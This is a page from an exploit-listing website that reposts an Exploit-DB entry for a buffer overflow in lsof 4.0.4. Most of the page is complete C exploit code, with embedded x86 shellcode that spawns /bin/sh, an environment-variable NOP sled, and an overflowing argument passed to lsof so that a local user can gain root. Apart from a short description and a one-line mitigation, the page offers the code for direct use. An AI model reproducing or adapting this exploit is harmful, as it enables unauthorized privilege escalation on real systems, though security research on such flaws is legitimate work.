Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Buffer Overflow in Lsof Utility - exploit.company
header-logo
Suggest Exploit
vendor:
Lsof
by:
Zhodiac
7.5
CVSS
HIGH
Buffer Overflow
121
CWE
Product Name: Lsof
Affected Version From: Lsof 4.0.4
Affected Version To: Lsof 4.0.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux

Buffer Overflow in Lsof Utility

This is a buffer overflow exploit in the Lsof utility. When the utility is run with root privileges, it is vulnerable to a buffer overflow that can allow regular users to gain root privileges.

Mitigation:

Update Lsof to a version that has fixed the buffer overflow vulnerability.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/496/info
 
Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges.

/* http://www.hackersnetwork.net! */

/*
 *  Xploit for lsof 4.0.4 by Zhodiac <zhodiac@usa.net>
 *  Based on Aleph's article in phrack49
 */

#include <stdlib.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE             32
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;
  char comando[512];

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  printf("\nXploit for lsof 4.04 by zhodiac <zhodiac@usa.net>\n\n");

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  snprintf(comando,511,"lsof -u %s",buff);
  system(comando);
}

Navigation

Suggest Exploit

Services By CQR